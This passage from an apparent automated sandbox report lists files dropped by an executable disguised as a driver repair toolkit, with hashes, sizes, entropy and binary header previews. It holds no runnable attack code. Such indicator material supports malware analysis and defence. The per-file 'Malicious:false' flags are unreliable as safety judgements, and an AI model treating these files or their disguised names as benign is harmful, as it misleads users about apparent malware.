                    Entropy (8bit):3.5335638662995046
                    Encrypted:false
                    SSDEEP:
                    MD5:A8283F0C13F681956DAF369882E478EB
                    SHA1:D5AAA73F738E5C8377DEE65D522E43B3F7C9C5C5
                    SHA-256:09CED31CAD8547A9EE5DCF739565DEF2F4359075E56A7B699CC85971E0905864
                    SHA-512:DFDC2A8B177C3363FECAAFC767DBB476826620B370DD4AB4BD5D8B85A83D1B6B9CEB593C31EF8F7D6A9BFC7D51111452C61E325890615DEB18482398DBA564C3
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................g............Rich....PE..d................." ....P................................................................`A........................................................................................p...p............................................................................text...B.......P................... ..`.rdata..$...`...0...`...............@..@.data........... ...................@....pdata.......... ...................@..@.CRT................................@..@.00cfg..............................@..@.rsrc...............................@..@.reloc.......... ...................@..BH..(.....H.. 3.H..(.H..u..............................ff............................0...........................(...............................P...P.......................d...d...................$...T...T...........

                    C:\ProgramData\ypkiExpertDriverToolkit\qedwipes.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.6093810406508173
                    Encrypted:false
                    SSDEEP:
                    MD5:9F49C93D4C440C08C765C546EFBD329E
                    SHA1:C50E43625A3F972EA9B9E09A665EF463E2BCC738
                    SHA-256:024AACD70EAC2668754CE10A7A6D02BBFFC5E32F0F5063C0435308D5F240DBF1
                    SHA-512:B5E9E410AD9CBB92A4D786BA39BB4807142AEBFD76CC4AC1D80063CE4429A96C3BDAE2D928DCA4F6787C9058E79FF24E2F46B3299E853F7762F6F2C4483D0844
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....<..........." .......................... ..............................0.......f....`.......................................................... ..@...............................8............................................................................rdata..............................@..@.rsrc...@.... ......................@..@......<.........T...8...8.........<.........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02.... ...].q...rzI..X..avV.....k.....<.........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\rdpbus.ini

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:Windows setup INFormation
                    Category:dropped
                    Size (bytes):3016
                    Entropy (8bit):3.7366586954540577
                    Encrypted:false
                    SSDEEP:
                    MD5:7D4188875C9E3B43CEB2CACE83B189FF
                    SHA1:376C7D226D1B748617A719719E4FD0DE756AC0C5
                    SHA-256:225F10AC76118C76A4698CD001F27D1927B7FE5F25F6D1E36F3AD777F58EBD5F
                    SHA-512:DB12FE56E40E8FDB10D87DFB9ECE74D6C666E75EC6C1C531A09536D64C20902C735FE4CF2309AFC556543A788E2D6FBFC2AFECC87ABD64D3B30448803352FBC3
                    Malicious:false
                    Reputation:low
                    Preview:..;.....;. .r.d.p.b.u.s...i.n.f.:.....;.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....3.4.2.6.=.w.i.n.d.o.w.s. .c.d.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....r.d.p.b.u.s...s.y.s. . . . . . . . . . .=. .3.4.2.6.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e.=.".$.W.I.N.D.O.W.S. .N.T.$.".....C.l.a.s.s.=.S.y.s.t.e.m.....C.l.a.s.s.G.u.i.d.=.{.4.D.3.6.E.9.7.D.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....P.r.o.v.i.d.e.r.=.%.M.s.f.t.%.....D.r.i.v.e.r.V.e.r. .=. .0.6./.2.1./.2.0.0.6.,.1.0...0...1.9.0.4.1...1.........[.D.e.s.t.i.n.a.t.i.o.n.D.i.r.s.].....D.e.f.a.u.l.t.D.e.s.t.D.i.r. .=. .1.2. . . . . . . . . . . . . . . . .;. .D.I.R.I.D._.D.R.I.V.E.R.S.........[.D.e.v.i.c.e.I.n.s.t.a.l.l.3.2.].....A.d.d.D.e.v.i.c.e. .=. .R.O.O.T.\.R.D.P.B.U.S.\.0.0.0.0.,.,.R.D.P.B.U.S._.R.o.o.t.D.e.v.i.c.e._.I.n.s.t.a.l.l.........[.R.D.P.B.U.S._.R.o.o.t.D.e.v.i.c.e._.I.n.s.t.a.l.l.].....H.a.r.d.w.a.r.e.I.d.s. .=. .R.O.O.T.\.R.D.P.B.U.S.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.s.f.t.

                    C:\ProgramData\ypkiExpertDriverToolkit\rnr20.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.9234152203264365
                    Encrypted:false
                    SSDEEP:
                    MD5:B7EE4EA3A902F9D6B45C3DAA17952555
                    SHA1:8A4041EC653DDADAB1ABD01A8668E07F5E1F35E5
                    SHA-256:84E206B915F5BF1CB79A336B659B7550373AC621A1EE0F9E20D8B074D024F5E6
                    SHA-512:048A726CA9626FE54E32C31385A93ACD66ABECCFF3CE99E667D11BE40E8303A7DA60F2A1B65724CAF0FE03957E45644A3FEBEA62D6DB4864180AE665F3537B4D
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d................." .........................................................0......fK....`A........................................`...\............ ..................................T............................................................................rdata..h...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\secman.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):172216
                    Entropy (8bit):6.1687171278480095
                    Encrypted:false
                    SSDEEP:
                    MD5:3A123660D93BCBD14CCAD373339A2678
                    SHA1:2EB378C496BFF33BE72F335533413190643E95F8
                    SHA-256:42737DA3D1599EAF1EFE657D1F082A1AC4007ECE7188AD3BF7E144B0BC81ED9A
                    SHA-512:EB9CD6F0D10A17D0C1C197477ED21E1FD6F934D99E628E94734DBEA5935C859A94D78CE37EEC8C32DA5A97C58A9C11F1F4A6EC1C7259DFBFF6ED5D5531BFD0EE
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..W.............w..}...Xu..k.......|.......p..........Xu..M...Xu..1...Xu..~...Xu..~...Xu..~...Rich............................PE..L...k#.`...........!.....p...................................................p......m............................... ................ ..(............`...@...@..........................................@............................................text...SQ.......`.................. ..`.orpc...@....p.......p.............. ..`.rdata...`.......p..................@..@.data...."....... ..................@....rsrc...(.... ... ..................@..@.reloc..r$...@...0...0..............@..B................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\secman64.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):187064
                    Entropy (8bit):6.082383725253929
                    Encrypted:false
                    SSDEEP:
                    MD5:8083F7CC742DB58B38E42CEF0794A2C4
                    SHA1:A93147212B31931FE9AF6D9016DF6B6A44F4B681
                    SHA-256:0282C36F2EED84C54C4AEF816BCC37D0CEB1CE69FCB48F1DE8102B4E0DF6B310
                    SHA-512:B6A3DB69F18D5DCD98C58E2EB05A9F692BB65F8BA1B94D07D84193737935B872DFBA171BD224766D35DB591B3E1F77FEF640EA8AB90F9815A3ED770D739B9251
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.B..WB..WB..W...W+..W...WH..W...Ws..W.d.W@..W.d.WM..WB..W..WO..WJ..WO..W@..WO..WC..WO..WC..WB..WC..WO..WC..WRichB..W........PE..d.../V.`.........." .....p...R.......................................................?....`..........................................:.......:...........................@......`.......8...............................p............................................text...4n.......p.................. ..`.rdata..l............t..............@..@.data....J...P... ...@..............@....pdata...............`..............@..@.rsrc................v..............@..@.reloc..`...........................@..B................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\security.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):5632
                    Entropy (8bit):3.909977210497967
                    Encrypted:false
                    SSDEEP:
                    MD5:1CA744FC9B81170501134518B89097F5
                    SHA1:6D22295A964A17B61B64CDFF0C8CDD14BFC7AC70
                    SHA-256:F8B73FAB687F20A3574DF1B823686FC53C769CFFA4B80610F81BEC13A29292A4
                    SHA-512:7400291733E1CA56138584C392D14C71CCBEC9262270A0D609389565A00072A9343CF8C0A70E3FE0B01365906910D58FB132CDC68BF070242D7AB06CE82AFE9F
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d...}............." .........................................................0.......)....`A........................................`................ .. ...............................T............................................................................rdata..............................@..@.rsrc... .... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\shimeng.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7680
                    Entropy (8bit):3.209108027004868
                    Encrypted:false
                    SSDEEP:
                    MD5:9BC92C78B0A9E90EC8E4554C11B2AF2A
                    SHA1:404A3C36257534611681F1C27A01A9CD021D8A1A
                    SHA-256:E07A473BBE2D8B651E837936F743BDD683FF0E126C1E8C30DDEAA9AACADDE443
                    SHA-512:DC7100F97AD541554A6FFA149AAB3019C33EBD868C1D67329A232C80BA9866F95B97E873CBC67BFA76EAB4E37B5AAD283B9FEDED3BC4605AA5A7D2B85DEFAA9B
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.S.9.=.9.=.9.=.-.<.<.=.9.<.4.=.-.9.<.=.-.>.;.=.-.=.8.=.-.5.;.=.-...8.=.-.?.8.=.Rich9.=.........PE..d.....U}.........." .........................................................p.......d....`A.........................................$..|....&..<....P.......@..H............`.......!..p............................ ..............(!..p............................text............................... ..`.rdata..d.... ......................@..@.data........0......................@....pdata..H....@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\system.ini

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:Windows SYSTEM.INI
                    Category:dropped
                    Size (bytes):219
                    Entropy (8bit):5.01511356509353
                    Encrypted:false
                    SSDEEP:
                    MD5:286A9EDB379DC3423A528B0864A0F111
                    SHA1:18DB3E3DFB6B1D4DC9BC2226109112466DE28DB0
                    SHA-256:6F533CCC79227E38F18BFC63BFC961EF4D3EE0E2BF33DD097CCF3548A12B743B
                    SHA-512:588720A82941B44338196F1808B810FECBBC56CB9979628F1126048C28F80B946314092A8DD26F5E7ACA234B7163C4B9C1283A65C9B36BE2A4DA9966FEB8B2CB
                    Malicious:false
                    Reputation:low
                    Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..

                    C:\ProgramData\ypkiExpertDriverToolkit\tapiui.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.9133070138493187
                    Encrypted:false
                    SSDEEP:
                    MD5:FD9CF66B1ED2E7F399FE6A97BBBB1CF4
                    SHA1:A81B980708C320510CE0FC56ED80B36B1A0A3933
                    SHA-256:5E755491CAD6597181A059307CDEDD6318EF74C4A8D6433B4950288AA5BC9FDC
                    SHA-512:710A44652AB386C4203F88086F4449F5240E4A8A0624922DD0E19ED8CE3277AE708551786FC88DB75FC00E11DBA506F378D7A0DD405D9F63CE9BBBC7924C6E03
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....D..........." .........................................................0............`.......................................................... ..X...............................8............................................................................rdata..............................@..@.rsrc...X.... ......................@..@......D.........T...8...8.........D.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...X.t..I.j`.$....'......<.G..D.........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\tier2punctuations.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.978760452045443
                    Encrypted:false
                    SSDEEP:
                    MD5:B170F7CC57C4DA7B5FA57CD7D4674DB1
                    SHA1:3FFF1E7A5EEC9C03490777B60167C6832DF4239B
                    SHA-256:A9F88DB397C0750763F5E5498203CF934481DCE1FF8A7459CE46FECFE8DC129D
                    SHA-512:8CC7D618D8DBE6906CD8B196D774DB586FA7286E2C770C1A7A2CDB3C86810AB054D6651213A17992B763DDD98CE8F5E99C39605DFBB9A8DD2D1A2684FBE46672
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....|N.........." .........................................................0............`A......................................................... ..X...............................T............................................................................rdata..............................@..@.rsrc...X.... ......................@..@.....|N........T...T...T........|N........$................|N............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...u../...K.t.r..c..@Ks....{...|N............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\tzres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.896319517722379
                    Encrypted:false
                    SSDEEP:
                    MD5:D3A705BF30F48DD17CC2BAE9306D7BB1
                    SHA1:579D377BF3AB10AF1C625A531C744792A32EDBF2
                    SHA-256:48378AA4A2DEA341516D383FF3BD4C8692A3C5DEDD33EC027659852AEF6F3514
                    SHA-512:E615DED5D6E0114A1D64281B4420DC85CD6B14B55DF593B54218F8268789DBE22DE1D0C56CF39148E4607AC5336BF5BB0A9F19463400C5494C8E0E0DA798C12C
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d................." .........................................................0......,.....`A......................................................... ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@................T...T...T...................$...............................................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... ..`....rsrc$02.... ....\..D=S....4G|}...j$f!...(................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\tzsyncres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):4096
                    Entropy (8bit):3.2722805489708646
                    Encrypted:false
                    SSDEEP:
                    MD5:D8DD76C289443ABDD5835D32B9C1028A
                    SHA1:AA6ABFCE548C3AB2F1674755205EA9B8E16D96CB
                    SHA-256:366905E144E8E19B6D73719C189C9B37222B5E2646E6CF295F6FD8456A899701
                    SHA-512:AD5B453CCC2D2F9559A51B2DBEAC66B0B64CA0B71EB28F0420A7FD638495FB58C6730DE3DAC262A11EFE3179032187923CBDC432C9A58A0DD9C6E327AF039CC9
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...K g|.........." .........................................................0.......u....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....K g|........T...8...8.......K g|........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!.......rsrc$02.... .....a.....s.c.6G.I..W.pv.[+..lK g|........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\vcruntime140.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):89416
                    Entropy (8bit):6.534146534180143
                    Encrypted:false
                    SSDEEP:
                    MD5:419CBC91B0847E3D1457AA5AF6847B8C
                    SHA1:131B37E549E1A6AF0BF889A303F24F95669EDCDC
                    SHA-256:60F0BFE9DAFCD8E678864337E0563A9AD359EF66169890F2F0AF76EAFA9E113E
                    SHA-512:0122EB4B3A0B396CFC9F3556ED0B7358DFB0ED9C8C7DEDD0D80E0F6BF8CD44ED9F6683DF1D2FC249238D80D03777BA67FE96C402ACAD681F8E7246BB856B1277
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.h.P.;.P.;.P.;..j;.P.;.(2;.P.;.P.;.P.;...:.P.;...:.P.;...:.P.;...:.P.;...:.P.;..^;.P.;...:.P.;Rich.P.;........PE..d...x..V.........." .........V......@........................................p...........`A........................................P...4............P.......0..X.......H?...`..t... ...8...........................`................................................text...'........................... ..`.rdata...7.......8..................@..@.data........ ......................@....pdata..X....0......................@..@_RDATA.......@......................@..@.rsrc........P......................@..@.reloc..t....`......................@..B........................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\win.ini

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:Generic INItialization configuration [extensions]
                    Category:dropped
                    Size (bytes):92
                    Entropy (8bit):4.561751095287907
                    Encrypted:false
                    SSDEEP:
                    MD5:23CF8138F49416231807E6DE371FB9E6
                    SHA1:973672EEAE5A05447E47395CDE37E8121B7C90FE
                    SHA-256:6B3D6E268DCB76E175A7DB3D9E031349AB2C32654C7E57581A851E64DD6214AB
                    SHA-512:42AE18A96645289CB0246D545DAA955D2FB0784993726414D0BC723DFB58B33CF11BB6B62BA7F5A3765E0C6C5713E8A02CD63638877CA032B82D4806E79950CF
                    Malicious:false
                    Reputation:low
                    Preview:; for 16-bit app support..[fonts]..[extensions]..[mci extensions]..[files]..[Mail]..MAPI=1..

                    C:\ProgramData\ypkiExpertDriverToolkit\wlanutil.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):3584
                    Entropy (8bit):3.1822595855214284
                    Encrypted:false
                    SSDEEP:
                    MD5:6CEDEFF8791B942CDA0074DC8EB3FFBE
                    SHA1:0E8F518C048EA83092E57A148E7BE196816DA6CC
                    SHA-256:B65BA3645B811DB5EFCF28578DCB87E344C52F1473DBF7D805223196EE5F412F
                    SHA-512:735487A70BEAE094CFC11D610A8263E9BD7C5F690ECC36844B9E1F073AEBC8140DABF502E88A1FFF48EE3A8776AED1D804EE93D3ED7ED4755CF51E5D81EC4AB3
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d.....'.........." .........................................................0.......9....`A........................................`................ ..@...............................T............................................................................rdata..............................@..@.rsrc...@.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\wmdrmsdk.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7680
                    Entropy (8bit):3.1431348092535702
                    Encrypted:false
                    SSDEEP:
                    MD5:F21F707431BC09744C538E05105799EC
                    SHA1:E5471D6E0BB34F5E7DA218C2FF65B61A64422471
                    SHA-256:CE8B2B8CE9E0F0587DBEE0E0FACBFB1436CA0EF6A2B6A517E185AF663D83C06C
                    SHA-512:DB94972861952C4FD0830B283EA5001209B007CCE0B7152B7B878155AED8FA4127326BC86F8AFDD55153DE2DA4FFBB575A7F41A6A89EE3B6BE4909653B614CC7
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........[..,[..,[..,R.h,Q..,O..-X..,[..,V..,O..-^..,O..-Y..,O..-Z..,O..-Y..,O..,Z..,O..-Z..,Rich[..,........PE..d....^I.........." ................0........................................p.......,....`A........................................ $..H...h%.......P.. ....@..<............`.......!..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata..<....@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\wmerror.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.88250298855823
                    Encrypted:false
                    SSDEEP:
                    MD5:B1D9E7FD4F50519FEF044B2FD9D6F163
                    SHA1:236ACF0364BDE9CF5D3F825A6C07212DA611D330
                    SHA-256:458CC90F5BEA2FF8DA97807530489B875526473D5DFB8C7DDBDA4F3C2A97D73A
                    SHA-512:4CC6AB27F9E4F28CB1F403D58176087863D6B57A55653C7B5FAE6896082EE60B1141B0720724FD783F252D23487F8CE4DE6EDD7B0CD5D6160BD6D2C64F5BAF7A
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...<ZF5.........." .........................................................0......N.....`.......................................................... ..8...............................8............................................................................rdata..............................@..@.rsrc...8.... ......................@..@....<ZF5........T...8...8.......<ZF5........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....R.>..6.|\@.........:....<.<ZF5........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\wmi.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:modified
                    Size (bytes):5632
                    Entropy (8bit):4.5395788917369035
                    Encrypted:false
                    SSDEEP:
                    MD5:6B25707FB209291415C05781FE6E2C75
                    SHA1:5C3317FB0DA9DA9561E408399A6A6344363F5737
                    SHA-256:2F26412C0F071B7655405BA3FF543B7B4CED763767DCC7309689253C2082D78A
                    SHA-512:8861E8494EACEC98022BEA08D233FC4AF7C7C8BD60BA1DCB89A8AB23616DA7C6FA6C37FFE5921CC00146AFC57C6CD35307CD46264DFC8EAA3AB9DBA6B17498AA
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d...L<............" .........................................................0............`A........................................`...@............ ..................................T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\wmploc.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):3.0188609315435646
                    Encrypted:false
                    SSDEEP:
                    MD5:570E9CD9F2B9ADCBC1D6A8987BFDB598
                    SHA1:967D5F8B94283753413B4C62466946653159FBF0
                    SHA-256:5B6AFE8F3CCBE8C19567F0B05A6F7846E632CDCE7F9DB5523E210D26F14CC466
                    SHA-512:8D69D9F780F3FBFD9ED2C7ECDAE5D1A6CD0B53D36A12A99ACA6393A8A423A4C2D84AD924AB14DB0F5E613A086AC4ED2D4D967A5D32CEFABC5C1E55B07F5C7DB1
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d................." .........................................................0.......J....`A......................................................... ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@................T...T...T...................$...............................................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... .....k....ix>L,%..1..k=".L..z.................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\ws2help.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):3.784531588266233
                    Encrypted:false
                    SSDEEP:
                    MD5:1EB8F9A912715EA39EB85617FB12608A
                    SHA1:D9C9D615BE07DCCCEB37D6A5B723BA8354023494
                    SHA-256:B45001D6EAABD3C87EAA1038C3FC8E912258FA7896C2B65117ED7DE2E83683F9
                    SHA-512:CCAD16E0E4209872B3EF03EC62394C5954D8FCB0AE0916C8F4D8A73DFF266AA5161F3095FF173AB2D58A1A9C087FA53E4E469A87662A5C61726289D41EF48632
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d..../............" .........................................................0......i.....`A........................................`...0............ .. ...............................T............................................................................rdata..<...........................@..@.rsrc... .... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe (copy)

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):412135424
                    Entropy (8bit):1.9612866326755067
                    Encrypted:false
                    SSDEEP:
                    MD5:4F2321A7D7EC44F7A6EF21D43CF4D470
                    SHA1:CEC41B2CE33E434CE338FD1DB592AF81915C9A53
                    SHA-256:2DCD988DC3EC468A7180C7875F1D83E894DEDD2DF13751650F770E82FCB213EF
                    SHA-512:A1DF8C21CA623AB634912C54AA175A581E8EBCF4290CE0784FCBB8E2FF58586AFA7D0B1280E604D03AE01DBCD64B26193295731F5D24365047BD6C5F94F43F71
                    Malicious:false
                    Reputation:low
                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....O.e................. ...........2.......@....@..........................@............@......@......................r.... ...g.......p...........................................................................0..........`....................text....z.......|.................. ..`.itext..`........................... ..`.data.......@.......$..............@....bss....|%...............................idata...g... ...h..................@....didata.`...........................@....edata..r............<..............@..@.tls....p................................rdata..]............>..............@..@.rsrc....p.......p...@..............@..@.............@......................@..@........................................................

                    C:\Users\Public\5SS6335S.xml

                    Download File
                    Process:C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe
                    File Type:ASCII text, with very long lines (526), with CRLF line terminators
                    Category:dropped
                    Size (bytes):528
                    Entropy (8bit):4.010578173109378
                    Encrypted:false
                    SSDEEP:
                    MD5:CC1FD2956FE284650E9CA7E50128F57D
                    SHA1:14334CF05F146064328D387F8BA391EF78E7CFDC
                    SHA-256:A605C76AD0E0BCD9C5F99B6F2D4F17DF69AAAA6EE9B50E7014CFEB7461FCB90F
                    SHA-512:F6122A1089363DAA36C5F2C9AAF25245FA96A369E691385A6BCB1A3A078074BEE8E972507BB2C8225757230E5B3134F125E643EB233B3C21B90958EB6ACE604B
                    Malicious:false
                    Reputation:low
